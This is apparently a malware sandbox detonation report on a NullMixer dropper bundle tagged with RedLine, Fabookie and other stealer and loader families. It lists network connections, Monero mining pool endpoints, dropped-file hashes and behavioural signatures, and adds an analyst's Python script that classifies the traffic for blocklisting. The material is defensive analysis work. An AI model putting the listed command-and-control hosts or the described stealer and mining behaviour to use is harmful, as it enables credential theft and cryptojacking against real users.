US 8.8.8.8:53 my-all-group.bar udp
US 151.101.193.164:443 rss.nytimes.com tcp
US 8.8.8.8:53 m525-blockchain31432.bar udp
US 151.101.193.164:443 rss.nytimes.com tcp
US 104.26.3.46:443 iplogger.org tcp
GB 142.250.187.238:80 www.google-analytics.com tcp
US 8.8.8.8:53 s3.tebi.io udp
US 104.26.3.46:443 iplogger.org tcp
DE 159.69.141.93:443 s3.tebi.io tcp
DE 159.69.141.93:443 s3.tebi.io tcp
US 104.26.3.46:443 iplogger.org tcp
DE 159.69.141.93:443 s3.tebi.io tcp
DE 159.69.141.93:443 s3.tebi.io tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
NL 45.9.20.156:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 www.microsoft.com udp
US 23.192.22.93:80 www.microsoft.com tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
NL 45.9.20.156:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 72.84.118.132:8080 tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
GB 51.195.138.197:14433 xmr-eu2.nanopool.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.58.224:14433 xmr-eu1.nanopool.org tcp
US 104.26.3.46:443 iplogger.org tcp
NL 45.9.20.156:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 72.84.118.132:8080 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
NL 45.9.20.156:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
NL 45.9.20.156:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
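The table above mixes four different kinds of traffic and a flat read-through loses that. The report's own "Legitimate hosting services abused" signature names iplogger.org and pastebin.com; two destinations are contacted by bare IP with no name at all (45.9.20.156:80 and 72.84.118.132:8080), which leaves neither DNS nor TLS SNI to pivot on; the two nanopool hosts on port 14433 are the TLS stratum endpoint from the miner's --url; crl.microsoft.com, c.pki.goog and www.microsoft.com are certificate and OS plumbing; and several names (t.gogamec.com, fobe1.com, whealclothing.xyz, my-all-group.bar, m525-blockchain31432.bar) are looked up but never connected to, so they either failed to resolve or were never used, and are still candidates for a blocklist. What is left (rss.nytimes.com, www.independent.co.uk, mas.to, s3.tebi.io) is not explained by this page; mas.to is a Mastodon instance, and Vidar, one of the families this sample is tagged with, has been reported to read its C2 address from Mastodon profiles, but nothing in this table confirms that here, so treat it as a lead. The script below is an added example, not part of this report or of any sandbox; it parses a subset of the rows above, copied in the report's order, and the stratum-port and background-noise lists are the author's assumptions.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Rows copied from the Network table of this report (a subset, in the report's order).
NETWORK_ROWS = """\
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 fobe1.com udp
US 8.8.8.8:53 rss.nytimes.com udp
US 151.101.193.164:443 rss.nytimes.com tcp
US 8.8.8.8:53 mas.to udp
US 172.67.166.96:443 mas.to tcp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 whealclothing.xyz udp
US 8.8.8.8:53 c.pki.goog udp
NL 45.9.20.156:80 tcp
US 104.26.3.46:443 iplogger.org tcp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 my-all-group.bar udp
US 8.8.8.8:53 m525-blockchain31432.bar udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 s3.tebi.io udp
DE 159.69.141.93:443 s3.tebi.io tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
GB 51.195.138.197:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.58.224:14433 xmr-eu1.nanopool.org tcp
NL 45.9.20.156:80 tcp
US 104.26.3.46:443 iplogger.org tcp
"""

# The domain column is optional: direct-to-IP rows have nothing between port and proto.
ROW = re.compile(
    r"^(?P<cc>[A-Z]{2})\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+"
    r"(?:(?P<domain>\S+)\s+)?(?P<proto>tcp|udp)$"
)


@dataclass(frozen=True)
class Flow:
    cc: str
    ip: str
    port: int
    domain: Optional[str]
    proto: str


# Rule data. The first two come from this report (the "Legitimate hosting services
# abused" signature and the miner's --url); the other two are the author's assumptions.
ABUSED_SERVICES = {"iplogger.org", "pastebin.com"}
MINING_POOL_SUFFIXES = ("nanopool.org",)
STRATUM_PORTS = {3333, 5555, 7777, 14433, 14444}                        # assumed common stratum ports
BACKGROUND = {"crl.microsoft.com", "www.microsoft.com", "c.pki.goog"}  # assumed OS/PKI plumbing


def parse_rows(text):
    flows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            flows.append(Flow(m["cc"], m["ip"], int(m["port"]), m["domain"], m["proto"]))
    return flows


def classify(f):
    if f.proto == "udp" and f.port == 53:
        return "dns-query"
    if f.domain is None:
        return "direct-ip"
    d = f.domain.lower()
    if d in ABUSED_SERVICES:
        return "abused-service"
    if d.endswith(MINING_POOL_SUFFIXES) or f.port in STRATUM_PORTS:
        return "mining-pool"
    if d in BACKGROUND:
        return "background"
    return "review"


def summarize(flows):
    return Counter(classify(f) for f in flows)


def queried_never_connected(flows):
    """Names the sample resolved but never opened a TCP connection to: dead,
    sinkholed or blocked infrastructure, still worth a blocklist entry."""
    queried = {f.domain.lower() for f in flows if classify(f) == "dns-query" and f.domain}
    connected = {f.domain.lower() for f in flows if f.proto == "tcp" and f.domain}
    return queried - connected


def direct_ip_endpoints(flows):
    """TCP connections with no name attached (no DNS, no SNI), with hit counts."""
    return Counter((f.ip, f.port) for f in flows if classify(f) == "direct-ip")


def review_queue(flows):
    """Connections the rules do not explain, deduplicated, with hit counts."""
    return Counter(f"{f.domain}:{f.port}" for f in flows if classify(f) == "review")


if __name__ == "__main__":
    flows = parse_rows(NETWORK_ROWS)
    for category, n in sorted(summarize(flows).items()):
        print(f"{category:16} {n}")
    print("direct-ip:", dict(direct_ip_endpoints(flows)))
    print("queried, never connected:", sorted(queried_never_connected(flows)))
    print("review:", dict(review_queue(flows)))
```

Fed the whole table, the same script also surfaces www.google-analytics.com as a TCP connection with no preceding DNS row in this capture, the kind of gap that usually means a cached answer or a lookup that happened before the sandbox started recording.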

Files

memory/2740-0-0x0000000074A8E000-0x0000000074A8F000-memory.dmp

memory/2740-1-0x0000000000E70000-0x000000000157C000-memory.dmp

\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe

MD5 a97c8c767343939c63ab2c3a7f9186fd
SHA1 5a8582d13af999922c1ad75db58950ad9523f8dc
SHA256 c528db4c190ac29c57c7810b26e9bf5c6e78b2ebbdbe64d81cfe57289a537768
SHA512 268bb93a76760e4f8a3d3229cdc5dec5930de46d1fdd85950015f68dab403f615d3e5854d04c72397c990cfd5525f233920c540adad50ef1e2696426ec37b599

\Users\Admin\AppData\Local\Temp\inst2.exe

MD5 d57afeb2944b37345cda2e47db2ca5e3
SHA1 d3c8c74ae71450a59f005501d537bdb2bdd456ee
SHA256 06fa55c63ca655c7d67ac59fc8276d086bc39dbe727ef7de80fc42dcd575711e
SHA512 d9ece7d17c4e275f85a4bc58128ef67abc33b19cc77425e5fd2f896a03975469432fa9ec8f05eeefe3ac5062c1fb842702cc80a4eb97b1737597b6dc3dde94e8

C:\Users\Admin\AppData\Local\Temp\4.exe

MD5 1581dee9ad745f69413381da2c06f68b
SHA1 79926e1bbcb97f41e63efcba2ab696259fdb98ce
SHA256 f8cb7c4bf0b265fcbed502ab4abb3dfa6c0488c0d53c68742582df26bbd6bf0e
SHA512 9ea8f526304bf123e4f50cb94468d01287576edafcbc25046c9d5094d8990dee38a9309d00462239a8c73f6b3d288354dd6fcfab29ab4fe60db6acde500283ff

C:\Users\Admin\AppData\Local\Temp\cxl-game.exe

MD5 199ac38e98448f915974878daeac59d5
SHA1 ec36afe8b99d254b6983009930f70d51232be57e
SHA256 b3f30bbad084a12ea28f3c21157083b1e0d30ca57e0da4e678d8567b5eb79dcf
SHA512 61af8746f073870dd632adb7cca4cec0f4772ea5737b25da1cce1f7104a5826019ea72ba84174b7758b73b2cd3fd8320c3acffd1bd5f96704d4061323413867e

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 a7703240793e447ec11f535e808d2096
SHA1 913af985f540dab68be0cdf999f6d7cb52d5be96
SHA256 6a17ebf5da6aa3a1f4813e5f46fdd5d19d026bcfac91f232359f98e43df3c38f
SHA512 57bdcdfcfa11f6b5bf4149be0fee0444fcf67ccececf1009b166b17b7dce30da1a472f1890736186f4ef76e02ed23cc0dd2a41dc9bff94218a059832d4b5c69e

C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe

MD5 7b1ff60b0ba26d132c74535a641a0e02
SHA1 0180b514cb32ae43fcefda0863a96f1f79a51b33
SHA256 accb11ccb1692a5e771981a5659d68c8adc3e225f476ca3387b57d818381ed1b
SHA512 3dbe1669e6f0f2c498a4276ef4d31ccf872bc2fcd4f1a1c282e6caf48d6cbd12d8685a05a9f43e3eef9fff8ba143ad1b14227f6c1a4a4263e242b5f8716a1034

memory/2844-40-0x0000000000910000-0x0000000000918000-memory.dmp

memory/2704-39-0x0000000000930000-0x000000000094A000-memory.dmp

memory/2552-44-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2704-49-0x0000000000240000-0x0000000000246000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

\Users\Admin\AppData\Local\Temp\is-OOOHO.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe

MD5 dd3f5335f760b949760b02aac1187694
SHA1 f53535bb3093caef66890688e6c214bcb4c51ef9
SHA256 90206625829c37a60ab736cfd7a8ff46f89524123b3246eabeaa77a2126bba26
SHA512 e715b69ca632f51c449a415ef831ed0d7e0160af20a3f79b09cb31bdce8920697c30c5f625851e9418bc087145b7b16deea7cc57c159c331350f1c88e7785004

\Users\Admin\AppData\Local\Temp\is-OOOHO.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2892-75-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1724-79-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2552-81-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2404-89-0x0000000000300000-0x0000000000308000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8.exe

MD5 360e4cdd67c04428d4a9b9b59d352584
SHA1 de633409edc357f21da340992cbb035350001254
SHA256 01a005463e33fb90c1b77e0fcee36f5e7856fe6868313df3c1fe123fe4c1e1a8
SHA512 e0c9056943d7e70f5e506696ce9b0236d083fe6cb08fb7511355fac380da3b56fad552789053d58de06b5e980fd38319b865be962b09e1d3f2f46a84ef177084

\Users\Admin\AppData\Local\Temp\Calculator Installation.exe

MD5 f7f7ab4f0a4d1c8d127a1c6bb4c0ea6e
SHA1 d7462d88f1fb9904fe3f1e937e2ebc0809607f8a
SHA256 f564d99d0ce406b1ca653ad2d3c40d6d4c6d9304729fd47a22bb6157be6294a6
SHA512 95e156b95132d6a7df5c15ba7f7d0b6d683a16e46c83716090a83a4cf1016f5a9e45ec45026f05287f55596bd669fac5b1873d89779795011ff7bd4484aab7e2

\Users\Admin\AppData\Local\Temp\nstF2F.tmp\System.dll

MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

\Users\Admin\AppData\Local\Temp\nstF2F.tmp\INetC.dll

MD5 2b342079303895c50af8040a91f30f71
SHA1 b11335e1cb8356d9c337cb89fe81d669a69de17e
SHA256 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f
SHA512 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

C:\Users\Admin\AppData\Local\Temp\Chrome4.exe

MD5 89d1bd67214042bde02749afdc91b85f
SHA1 bd3b9b45fecb02a8d38a3f2dab7de14a3e4f8ea4
SHA256 4672ca322e9d03b30223452f9d9be6e78d957ef47fc046fc60a1fffc1edad1e0
SHA512 bacf183ae91cd2f8521f5ff376a2f004b2222738b5ffe2c69d623b33266186ccc7036fb255591af1d3b7f1003376950486e42cb1dc202a60ffd597a7227a15ad

memory/1540-140-0x0000000001100000-0x0000000001108000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Jonba.exe

MD5 3434b3e59d0dc8d25ff3e83ced5d6f87
SHA1 1cfc6af2e22fc55e8bcbce2cbe0ea572cff11d8f
SHA256 f2201a75165335d71b3f303fb46db6b8e6e160cba924bc02b2409da5c8c83b40
SHA512 6f7850598937f930a6732a1e713ebe47cc716fe9e32a68623378c8143c57da1f51f4af97f6886bce3f48b8a04b0bd540839eee23ca0926f6bf44c2f5af12980a

C:\Users\Admin\AppData\Local\Temp\RarSFX1\WcWfz1Tn.MJ

MD5 e1caa9cc3b8bd60f12093059981f3679
SHA1 f35d8b851dc0222ae8294b28bd7dee339cc0589b
SHA256 254b6e6f43b2707ac107664b163ba074051b0534aafa8faf85a1760299182565
SHA512 23f3fa616c1a96acd9a781d833a69ac37a9989dc5605396ecde41beae971b287bc963ea8020c56d92034e7e284c37639280650e1674864707ba859ad5815cdfa

C:\Users\Admin\AppData\Local\Temp\RarSFX1\1w8lBDVH.aou

MD5 112b8c9fa0419875f26ca7b592155f2b
SHA1 0b407062b6e843801282c2dc0c3749f697a67300
SHA256 95ae984c19dbf91919296efb398aaf700605910a28abe9288c7639c7d9223202
SHA512 a71e187dbc18c2d7cd21b1e856ee7d58e230b801758ed6a2205e8dacdc8235a09111014cff3171ea82e8942251508ada57eefdbcbc13daddbfbe30eddc29dad8

C:\Users\Admin\AppData\Local\Temp\RarSFX1\MyBa.V

MD5 51424c68f5ff16380b95f917c7b78703
SHA1 70aa922f08680c02918c765daf8d0469e5cd9e50
SHA256 065f5b48408abb0260d68775e6db36136c8ac2bd7c8a1168613cc5cb8825d315
SHA512 c7510a9555402d64665bcbce661eb54c1bcbb20095c084036d8af625de9d0bf93cb33e93cbc9b6efbc73f9080ef7052dcbc35fb8d44ccf56fb2db8af933e06af

C:\Users\Admin\AppData\Local\Temp\RarSFX1\9Bu~.w

MD5 8b4e06aede42785b01c3cdf3f0883da6
SHA1 664fdc12cb0141ffd68b289eaaf70ae4c5163a5a
SHA256 8a8d67872f0bc6e6669f7396a84b879d12882ea495467b09b6613edfc4108c42
SHA512 7b6a20e41365c546f1aa5a84964b36fc4cedd194754d1f09cfdadf822f4141d037067811ca62a7d2da23ec1e332943cb828d4f771308fdfa79327cb3fb6f2c82

C:\Users\Admin\AppData\Local\Temp\RarSFX1\hKS2IU.1Q

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/1860-212-0x00000000028E0000-0x00000000038E0000-memory.dmp

memory/2772-213-0x0000000000400000-0x0000000002F74000-memory.dmp

memory/2892-214-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1880-215-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1860-217-0x00000000028E0000-0x00000000038E0000-memory.dmp

memory/2216-223-0x0000000000110000-0x0000000000330000-memory.dmp

memory/2216-224-0x000000001B360000-0x000000001B580000-memory.dmp

memory/1860-225-0x000000002D360000-0x000000002D406000-memory.dmp

memory/1860-229-0x000000002D410000-0x000000002D4A3000-memory.dmp

memory/1860-226-0x000000002D410000-0x000000002D4A3000-memory.dmp

memory/1860-239-0x000000002D410000-0x000000002D4A3000-memory.dmp

memory/1860-240-0x000000002D4B0000-0x000000002E316000-memory.dmp

memory/1860-241-0x000000002E320000-0x000000002E3AD000-memory.dmp

memory/1860-242-0x000000002E3B0000-0x000000002E438000-memory.dmp

memory/1860-243-0x000000002E3B0000-0x000000002E438000-memory.dmp

memory/1860-245-0x000000002E3B0000-0x000000002E438000-memory.dmp

memory/1860-246-0x0000000000090000-0x0000000000093000-memory.dmp

memory/1860-247-0x00000000000A0000-0x00000000000A5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 816520bddbb9cd95a5904ba5c6626989
SHA1 d6aca0489429c82eab0f5e213f1ca93648a36eb2
SHA256 8877b12798309300f6f18ac44e2c4770076c152b5ba36f17b8bf94338adc178a
SHA512 2db4fb133d24d8cd8905c42e8affab1efd322efa740ba8381de4a0f610a2492a78dfc42761d85d7df13334938da7ddd0fe95a6066ff3d40f03c2f71f2f5660c3

memory/2656-262-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-260-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-270-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-276-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-274-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-272-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-268-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-266-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-264-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1620-307-0x0000000001C60000-0x0000000001C66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f78be40.exe

MD5 a014b8961283f1e07d7f31ecdd7db62f
SHA1 70714b6dc8abbaa5d1cba38c047ea3a4ec6ac065
SHA256 21ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89
SHA512 bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869

memory/2220-321-0x0000000000A80000-0x0000000000A88000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

10s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3824 set thread context of 1064 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\control.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe N/A
